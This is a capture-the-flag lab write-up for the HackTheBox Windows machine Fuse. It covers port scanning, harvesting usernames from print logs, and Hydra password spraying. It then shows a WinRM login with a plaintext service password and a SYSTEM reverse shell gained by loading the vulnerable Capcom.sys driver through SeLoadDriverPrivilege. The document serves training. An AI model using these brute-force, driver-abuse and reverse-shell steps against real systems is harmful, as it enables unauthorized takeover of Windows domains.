HackTheBox Fuse Writeup – 10.10.10.193
HackTheBox Fuse – 10.10.10.193 is a new Medium difficulty Windows box by egre55. This is second Windows machine after Blackfield (writeup here) in a row released by HTB. My honest opinion on this box is the difficulty rating “Medium” is not fairly applied as this box is much harder than the previous box Blackfield. This box need at least a little programming knowledge that most of the users lacks.
Let’s start with a port scan.
$ nmap -sC -sV -p- -oA fuse fuse.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 10:00 +03 Nmap scan report for fuse.htb (10.10.10.193) Host is up (0.16s latency). Not shown: 65514 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 07:25:55Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 49751/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/17%Time=5EE9C162%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h37m41s, deviation: 4h02m30s, median: 17m40s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-06-17T00:28:16-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-17T07:28:18 |_ start_date: 2020-06-17T02:24:56 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 779.73 seconds
NMAP scan shows us, a large number of ports are open, which is normal situation while scanning Windows boxes. The scan as well shows the machine name is Fuse.fabricorp.local, and belongs to the active directory fabricorp.local and the OS is Windows Server 2016 Standard 6.3.
As we can see MS IIS is running on the port, let us visit the website hosted and see what is it.
Visiting the default page redirects us to an internal page “http://fuse.fabricorp.local/papercut/logs/html/index.htm” which looks like a PaperCut print management application. However, the page doesn’t open. Let us add the machine name to etc/hosts and see what happens.
Ok, the right application PaperCut print logger is loaded after adding fuse.fabricorp.local to our hosts file.
The Print logs in the PaperCut has log files that seem to have a number of usernames and internal system names. There are 2 types of files, HTML and CSV and the log is categorized per day and per month. Let us download and gather usernames first.
$ cat usernames.txt pmerton tlavel sthompson bnielson pmerton bhult administrator
As we can see SMB, but unable to list the share, we need credentials.
$ smbclient -L fuse.htb Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available
After spending some time, I decided to see if there is a possibility to get passwords from the files I have.
$ cat *.csv* | cut -d ',' -f2,5-7 |tr '.' '\n' |tr -d '"' | tr ',' '\n' | tee password.txt PaperCut Print Logger - http://www papercut com/ User Printer Document Name Client pmerton HP-MFT01 New Starter - bnielson - Notepad JUMP01 tlavel HP-MFT01 IT Budget Meeting Minutes - Notepad LONWK015 sthompson HP-MFT01 backup_tapes - Notepad LONWK019 sthompson HP-MFT01 mega_mountain_tape_request pdf LONWK019 sthompson HP-MFT01 Fabricorp01 docx - Word LONWK019 PaperCut Print Logger - http://www papercut com/ User Printer Document Name Client pmerton HP-MFT01 New Starter - bnielson - Notepad JUMP01 tlavel HP-MFT01 IT Budget Meeting Minutes - Notepad LONWK015 PaperCut Print Logger - http://www papercut com/ User Printer Document Name Client sthompson HP-MFT01 backup_tapes - Notepad LONWK019 sthompson HP-MFT01 mega_mountain_tape_request pdf LONWK019 sthompson HP-MFT01 Untitled - Notepad FUSE sthompson HP-MFT01 Fabricorp01 docx - Word LONWK019 User Printer Document Name Client pmerton HP-MFT01 New Starter - bnielson - Notepad JUMP01 tlavel HP-MFT01 IT Budget Meeting Minutes - Notepad LONWK015 sthompson HP-MFT01 backup_tapes - Notepad LONWK019 sthompson HP-MFT01 mega_mountain_tape_request pdf LONWK019 sthompson HP-MFT01 Fabricorp01 docx - Word LONWK019 PaperCut Print Logger - http://www papercut com/ User Printer Document Name Client bhult HP-MFT01 offsite_dr_invocation - Notepad LAPTOP07 administrator HP-MFT01 printing_issue_test - Notepad FUSE PaperCut Print Logger - http://www papercut com/ User Printer Document Name Client bhult HP-MFT01 offsite_dr_invocation - Notepad LAPTOP07 administrator HP-MFT01 printing_issue_test - Notepad FUSE
After removing duplicates and file extension names, I have the list ready for Hydra SMB brute forcing.
In next few minutes, Hydra paired 3 users with valid credential Fabricorp01.
bhult:Fabricorp01 bnielson:Fabricorp01 tlavel:Fabricorp01
With valid credentials, I proceed to access SMB, I have the session setup failed error on all 3 users – NT_STATUS_PASSWORD_MUST_CHANGE
$ smbclient -L fuse.htb -U tlavel Enter WORKGROUP\tlavel's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE ----------- $ smbclient -L fuse.htb -U bnielson Enter WORKGROUP\bnielson's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE ----------- $ smbclient -L fuse.htb -U tlavel Enter WORKGROUP\tlavel's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
To access the SMB I need to change the password first. As I recall, Samba has a utility called “smbpasswd” to change a user’s SMB password. Let us see if I’ll be able to change prior to login.
The command goes like this:
smbpasswd [-a] [-c <config file>] [-x] [-d] [-e] [-D debuglevel] [-n] [-r <remote machine>] [-R <name resolve order>] [-m] [-U username[%password]] [-h] [-s] [-w pass] [-W] [-i] [-L] [username]
I tried to use the simple password to save time, but it looks like the password should meet the preset criteria.
$ smbpasswd -U bhult -r 10.10.10.193 Old SMB password: New SMB password: Retype new SMB password: machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
Using a complex password I was able to set a new password for the user bhult and list the SMB shares.
$ smbpasswd -U bhult -r 10.10.10.193 Old SMB password: New SMB password: Retype new SMB password: Password changed for user bhult on 10.10.10.193. ------------/snip/------------- $ smbclient -L fuse.htb -U bhult Enter WORKGROUP\bhult's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
After starting to enumerate what I noticed was the password resets after a certain period, probably after a minute or so. I had to reset my password several times before I fully enumerate things.
$ smbpasswd -U bnielson -r 10.10.10.193 Old SMB password: New SMB password: Retype new SMB password: Password changed for user bnielson on 10.10.10.193. # root @ nav1n in ~/htb/fuse [12:21:58] $ smbclient -L fuse.htb -U bnielson Enter WORKGROUP\bnielson's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available
And I as well noticed the directories shared between the users are the same, so I decided to wok with only one user, so I don’t need to change password for everyone when t resets.
As I’m able to authenticate the user, my next step is to list the users and possibly a service account that I could try to exploit.
# root @ nav1n in ~/htb/fuse [12:34:48] $ rpcclient -U bnielson 10.10.10.193 Enter WORKGROUP\bnielson's password: rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] rpcclient $>
The main goal of this machine is exploiting the printer to gain foothold and carrying it forward. So Let us explore the printers in the domain using RPC EnumPrinters command.
The EnumPrinters revealed a new password, looks like for the scan2docs, to make sure which user the password can be used, I run the hydra again and found two newly found service users “svc-print” and “svc-scan” are matched with the credential.
I tried to find login page and SMB but I wasn’t succeeded. But Looking at my previously ran Enum4Linux results, I noticed user FABRICORP\svc-print is a member of the domain group FABRICORP\IT_Accounts and for my surprise IT_Accounts is a part of group “Remote Management Users”. This means I will be able to connect the box using svc-print and his password by WinRM – or Evil-WinRM.
As assumed, I successfully managed to log-in to the system using Evil-WinRM and svc-print’s password. The user’s falg was found in the desktop and I grabbed it.
As always, after getting the user shell, let us check the privileges of our current user.
The user svc-print has a special privilege called “SeLoadDriverPrivilege” allows the assigned user to install or uninstall a device driver. Its pretty normal to have a user who manages Printers to have this privilege. However, a simple misconfiguration would lead to privilege escalation. There are a lot of PoCs that lead from low level shell to Administrator abusing this privilege.
If you search Google “SeLoadDriverPrivilege Abuse”, the first result from “tarlogic.com” shows how to abuse the SeLaddriverPrivilege to gain the escalated privilege. As the above mentioned article says, I’m going to use Capcom.sys because it is a signed driver.
Let us start our rooting process. Firstly, I need to obtain the following files and Git-repo in order to build my own vulnerable executable file.
- CapCom.sys file: https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- ExploitCapcom: https://github.com/tandasat/ExploitCapcom
- EoPLoaderDriver: https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
Once I have all the files ready with me, I compiled ExploitCapcom using my Visual Studio 2019 x64 Release mode and produced an exe file “ExploitCapcom.exe”
I as well build a simple exe file using c++ for my reverse connection.
Once I have everything, I upload the files into a temp directory and start my netcat listener in a separate terminal.
root@nav1n:~/htb/fuse # ruby evil-winrm.rb -i fuse.htb -u svc-print -p '$fab@s3Rv1ce$1' Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/18/2020 6:01 AM 10576 Capcom.sys -a---- 6/18/2020 5:59 AM 69632 ExploitCapcom.exe -a---- 6/18/2020 6:00 AM 38616 nc.exe -a---- 6/18/2020 6:00 AM 38400 Reverse.exe
As I have required files and listener is up and running, I executed my vulnerable kernel module from the temp directory. The permission was enabled and the vulnerable driver was loaded to kernel successfully.
./ExploitCapcom.exe System\CurrentControlSet\fuser C:\temp\Capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\fuser NTSTATUS: 00000000, WinError: 0
As the kernel is loaded let us exploit it using the below command so my listener get the reverse connection.
.\ExploitCapcom.exe C:\temp\Reverse.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obtained as 000****** [*] Shellcode was placed at 0000******* [+] Shellcode was executed [+] Token stealing was successful [+] Command Executed
So…. here is it, the listener is activated as System and I have the shell back as System.
Ncat: Connection from 10.10.10.193. Ncat: Connection from 10.10.10.193:5138. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\temp>whoami whoami nt authority\system
That is the end of the story of Fuse machine and as well the end of HackTheBox Fuse Writeup. Thank you for your visit and reading.